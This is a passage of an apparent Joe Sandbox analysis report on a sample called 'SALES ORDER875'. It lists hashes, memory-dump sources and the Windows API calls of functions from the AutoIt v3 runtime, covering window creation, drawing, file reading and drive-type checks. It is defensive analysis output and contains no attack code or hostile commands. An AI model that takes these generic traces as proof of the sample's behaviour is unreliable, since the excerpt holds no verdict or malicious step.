                                                                                                                                                                                    • Instruction ID: 215fa0cea8ccab0442769df762d334cfb14e73e0c985e2c24d1c5a153b4d3c3c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 747ddb1b2c3f178d133bec5297ae20c9e9815954376a0193e7faa6748437f4b1
                                                                                                                                                                                    • Instruction Fuzzy Hash: B6918F86A4CAC25FEB0B8B745C29702BF327B63104B4DD7EFC49A868D3E7599451C742
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1832043021.0000000001A8D000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A8D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1a8d000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                                    • Instruction ID: 823fb3434defb6df90a33a6c61503b9deabe6ede1b73500ed4fc36c1133c0d7f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0241C471D1051CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB40
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1832043021.0000000001A8D000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A8D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1a8d000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                                    • Instruction ID: 7a7d1ab5587f191a8198d6d508733ef13a0d6508f0b88322a804cb5e4360dd56
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                                    • Instruction Fuzzy Hash: C6019278E01209EFCB44DF98C5909AEF7F5FB48320F608699D819A7301E730AE81DB80
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1832043021.0000000001A8D000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A8D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1a8d000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                                    • Instruction ID: c314d4093da77970256838d328066d5c6aaa22f3c2671a0e84394c28f7fe4c97
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 07019278A01209EFCB44DF98C5909AEF7F5FB48320F6086A9D819E7741D731AE91DB80
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1832043021.0000000001A8D000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A8D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1a8d000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00402B30
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00402B43
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00402B52
                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00402B6D
                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00402B74
                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00402CA3
                                                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00402CB1
                                                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00402CF8
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00402D04
                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00402D40
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00402D62
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00402D75
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00402D80
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00402D89
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00402D98
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00402DA1
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00402DA8
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402DB3
                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00402DC5
                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0041FC38,00000000), ref: 00402DDB
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402DEB
                                                                                                                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00402E11
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00402E30
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00402E52
                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040303F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                                                                    • Opcode ID: 4196309daacc2b33fb1ed9615b95fc02e13986a2f0a7363fd801f391c38d6e70
                                                                                                                                                                                    • Instruction ID: f3552a47259f1ab3410643c5d7d54bc02b9ae19bc9d00c531119eb3ea26f3e1c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4196309daacc2b33fb1ed9615b95fc02e13986a2f0a7363fd801f391c38d6e70
                                                                                                                                                                                    • Instruction Fuzzy Hash: A402AC71A00205AFDB14DF64CD89EAE7BB9FB49711F108169F815AB2E1CB74ED01CB68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0041712F
                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00417160
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0041716C
                                                                                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00417186
                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00417195
                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004171C0
                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 004171C8
                                                                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 004171CF
                                                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 004171DE
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004171E5
                                                                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00417230
                                                                                                                                                                                    • FillRect.USER32(?,?,?), ref: 00417262
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00417284
                                                                                                                                                                                      • Part of subcall function 004173E8: GetSysColor.USER32(00000012), ref: 00417421
                                                                                                                                                                                      • Part of subcall function 004173E8: SetTextColor.GDI32(?,?), ref: 00417425
                                                                                                                                                                                      • Part of subcall function 004173E8: GetSysColorBrush.USER32(0000000F), ref: 0041743B
                                                                                                                                                                                      • Part of subcall function 004173E8: GetSysColor.USER32(0000000F), ref: 00417446
                                                                                                                                                                                      • Part of subcall function 004173E8: GetSysColor.USER32(00000011), ref: 00417463
                                                                                                                                                                                      • Part of subcall function 004173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00417471
                                                                                                                                                                                      • Part of subcall function 004173E8: SelectObject.GDI32(?,00000000), ref: 00417482
                                                                                                                                                                                      • Part of subcall function 004173E8: SetBkColor.GDI32(?,00000000), ref: 0041748B
                                                                                                                                                                                      • Part of subcall function 004173E8: SelectObject.GDI32(?,?), ref: 00417498
                                                                                                                                                                                      • Part of subcall function 004173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 004174B7
                                                                                                                                                                                      • Part of subcall function 004173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004174CE
                                                                                                                                                                                      • Part of subcall function 004173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 004174DB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4124339563-0
                                                                                                                                                                                    • Opcode ID: 075cedba2921a5d575cabe85a6399da6476c5216d7b06e5c002e1f055e19e775
                                                                                                                                                                                    • Instruction ID: ea1525ac1a9ac907b89d0c35b2520a8ca9a849b41ce762ee696d999bc004107e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 075cedba2921a5d575cabe85a6399da6476c5216d7b06e5c002e1f055e19e775
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2A1A072048311FFDB019F60DC88A9B7BBAFB49320F104A29F962961E1D774E985CF56
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00398E14
                                                                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 003D6AC5
                                                                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003D6AFE
                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 003D6F43
                                                                                                                                                                                      • Part of subcall function 00398F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00398BE8,?,00000000,?,?,?,?,00398BBA,00000000,?), ref: 00398FC5
                                                                                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 003D6F7F
                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003D6F96
                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 003D6FAC
                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 003D6FB7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 2760611726-4108050209
                                                                                                                                                                                    • Opcode ID: 85ae0f53878316d765c352ef7a7abd355c7e55f5c3b0b431fc654882a6088fa4
                                                                                                                                                                                    • Instruction ID: e849c30decd760bda7f907cc27186770f3189d567b62eddb6016eaedf2f3e208
                                                                                                                                                                                    • Opcode Fuzzy Hash: 85ae0f53878316d765c352ef7a7abd355c7e55f5c3b0b431fc654882a6088fa4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5812DF71600211EFCB22CF24E895BBAB7E5FB85300F15846AF4A58B662CB31EC51CF55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0040273E
                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040286A
                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 004028A9
                                                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004028B9
                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00402900
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040290C
                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00402955
                                                                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00402964
                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00402974
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402978
                                                                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00402988
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00402991
                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 0040299A
                                                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004029C6
                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 004029DD
                                                                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00402A1D
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00402A31
                                                                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00402A42
                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00402A77
                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00402A82
                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00402A8D
                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00402A97
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                                                                    • Opcode ID: a3024bb3dcd9cfad27b66e89917034a01a3b6f67276768df7ee03da09593c1ca
                                                                                                                                                                                    • Instruction ID: 242e7ac5be739cccdddfe99162034f9ea524702ab3e72451a0590947dc05c32d
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3024bb3dcd9cfad27b66e89917034a01a3b6f67276768df7ee03da09593c1ca
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DB18F71A40215AFEB10DF68CD89FAE7BA9EB05711F108165F914EB2E1D774ED00CBA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 003F4AED
                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,0041CB68,?,\\.\,0041CC08), ref: 003F4BCA
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,0041CB68,?,\\.\,0041CC08), ref: 003F4D36
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                                                    • Opcode ID: 77e9d26ab7977895dfd5e776c349a2c7b1529c72d049ec62f9e2a724183cb2c2
                                                                                                                                                                                    • Instruction ID: c383777e46b32273d5c778e2388b32762334fe667300de16646dd04bae03b26a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 77e9d26ab7977895dfd5e776c349a2c7b1529c72d049ec62f9e2a724183cb2c2
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2614670B0030DEBDB06EF24C982E7E77B4AB05710B318056F906ABA96CB39DD41DB56
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00417421
                                                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00417425
                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0041743B
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00417446
                                                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 0041744B
                                                                                                                                                                                    • GetSysColor.USER32(00000011), ref: 00417463
                                                                                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00417471
                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00417482
                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0041748B
                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00417498
                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004174B7
                                                                                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004174CE
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 004174DB
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0041752A
                                                                                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00417554
                                                                                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00417572
                                                                                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 0041757D
                                                                                                                                                                                    • GetSysColor.USER32(00000011), ref: 0041758E
                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00417596
                                                                                                                                                                                    • DrawTextW.USER32(?,004170F5,000000FF,?,00000000), ref: 004175A8
                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 004175BF
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004175CA
                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 004175D0
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004175D5
                                                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 004175DB
                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004175E5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1996641542-0
                                                                                                                                                                                    • Opcode ID: 6b6250ab6edb00696d9943888ccc804298a275cb68e598c44daccbb249a6c95a
                                                                                                                                                                                    • Instruction ID: 75070cacf9695fc6615913052d33176ec3132e4ab096445a0bb338118d2651e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b6250ab6edb00696d9943888ccc804298a275cb68e598c44daccbb249a6c95a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B615E72944218BFDF019FA4DC89EEEBFB9EB08320F118125F915AB2A1D7749940CF94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00411128
                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0041113D
                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00411144
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00411199
                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 004111B9
                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004111ED
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0041120B
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0041121D
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00411232
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00411245
                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 004112A1
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 004112BC
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 004112D0
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004112E8
                                                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0041130E
                                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00411328
                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0041133F
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 004113AA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                                                                    • Opcode ID: a0e5133816ff5e6a92b4a95a73ae904ad0b17a6ca6e22ac17085881276490fe6
